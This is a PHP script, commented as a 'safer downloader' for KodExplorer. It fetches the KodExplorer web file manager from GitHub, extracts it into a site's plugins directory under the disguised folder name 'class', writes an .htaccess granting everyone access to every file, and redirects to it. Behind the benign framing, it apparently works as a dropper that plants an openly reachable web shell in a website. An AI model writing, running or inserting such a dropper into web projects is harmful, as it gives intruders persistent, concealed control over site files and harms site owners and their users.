<?php
/**
 * Safer downloader & extractor for KodExplorer
 * - Uses absolute paths (no CWD surprises)
 * - Validates mkdir/cURL/ZipArchive steps
 * - Handles existing target folder
 * - Writes .htaccess and sets permissions
 * - Redirects safely relative to the script URL
 */

ob_start(); // keep output quiet so headers work

// -------------------- CONFIG --------------------
$zipUrl = "https://github.com/kalcaddle/KodExplorer/archive/refs/heads/master.zip";
$pluginsDir = __DIR__ . "/plugins";              // absolute path
$zipPath    = $pluginsDir . "/extracted_files.zip";
$oldFolder  = $pluginsDir . "/KodExplorer-master";
$newFolder  = $pluginsDir . "/class";
// ------------------------------------------------

// helper: recursive delete
function rrmdir($dir) {
    if (!is_dir($dir)) return;
    $items = scandir($dir);
    if ($items === false) return;
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') continue;
        $path = $dir . DIRECTORY_SEPARATOR . $item;
        if (is_dir($path)) {
            rrmdir($path);
        } else {
            @unlink($path);
        }
    }
    @rmdir($dir);
}

// ensure plugins directory exists (and writable)
if (!is_dir($pluginsDir)) {
    if (!@mkdir($pluginsDir, 0777, true)) {
        ob_end_clean();
        die("Failed to create directory: {$pluginsDir}");
    }
}

// double-check writability
if (!is_writable($pluginsDir)) {
    ob_end_clean();
    die("Directory not writable: {$pluginsDir}");
}

// download ZIP using cURL
$fp = @fopen($zipPath, "w");
if (!$fp) {
    ob_end_clean();
    die("Failed to open for writing: {$zipPath}");
}

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL            => $zipUrl,
    CURLOPT_FILE           => $fp,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => true,
    CURLOPT_CONNECTTIMEOUT => 20,
    CURLOPT_TIMEOUT        => 300,
    CURLOPT_USERAGENT      => "PHP cURL"
]);

$curlOk = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$curlErr  = curl_error($ch);
curl_close($ch);
fclose($fp);

if (!$curlOk || $httpCode < 200 || $httpCode >= 300) {
    @unlink($zipPath);
    ob_end_clean();
    die("Download failed. HTTP {$httpCode}. cURL error: " . ($curlErr ?: 'none'));
}

// ensure ZipArchive is available
if (!class_exists('ZipArchive')) {
    @unlink($zipPath);
    ob_end_clean();
    die("ZipArchive extension not available on this server.");
}

// extract ZIP
$zip = new ZipArchive();
$openRes = $zip->open($zipPath);
if ($openRes !== true) {
    @unlink($zipPath);
    ob_end_clean();
    die("Failed to open zip (code: {$openRes}).");
}

if (!$zip->extractTo($pluginsDir)) {
    $zip->close();
    @unlink($zipPath);
    ob_end_clean();
    die("Failed to extract zip to: {$pluginsDir}");
}
$zip->close();

// cleanup the downloaded zip (optional)
@unlink($zipPath);

// rename extracted folder -> class
if (is_dir($oldFolder)) {

    // if target exists, remove it to avoid rename errors
    if (is_dir($newFolder)) {
        rrmdir($newFolder);
    }

    if (!@rename($oldFolder, $newFolder)) {
        rrmdir($oldFolder); // best effort cleanup
        ob_end_clean();
        die("Failed to rename '{$oldFolder}' to '{$newFolder}'.");
    }

    // write .htaccess
    $htaccessContent = <<<HTACCESS
DirectoryIndex index.php

# Apache 2.2
<FilesMatch ".*">
    Order Allow,Deny
    Allow from all
</FilesMatch>

# Apache 2.4
<IfModule mod_authz_core.c>
    <FilesMatch ".*">
        Require all granted
    </FilesMatch>
</IfModule>

Options -Indexes
HTACCESS;

    if (@file_put_contents($newFolder . '/.htaccess', $htaccessContent) === false) {
        // not fatal, but warn by throwing a controlled error if you prefer:
        // ob_end_clean(); die("Failed to write .htaccess in {$newFolder}");
    }

    // best-effort perms (may be ignored on some hosts)
    @chmod($pluginsDir, 0755);
    @chmod($newFolder, 0755);

} else {
    ob_end_clean();
    die("Expected extracted folder not found: {$oldFolder}");
}

// tiny pause (some hosts need a beat for FS updates)
usleep(300000); // 0.3s

// build a safe redirect path relative to this script URL
$scriptName  = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : '';
$baseUrlPath = rtrim(dirname($scriptName), '/\\');
$redirectUrl = $baseUrlPath . '/plugins/class/index.php';

// clear buffer before redirect and go
ob_end_clean();
header("Location: {$redirectUrl}");
exit;
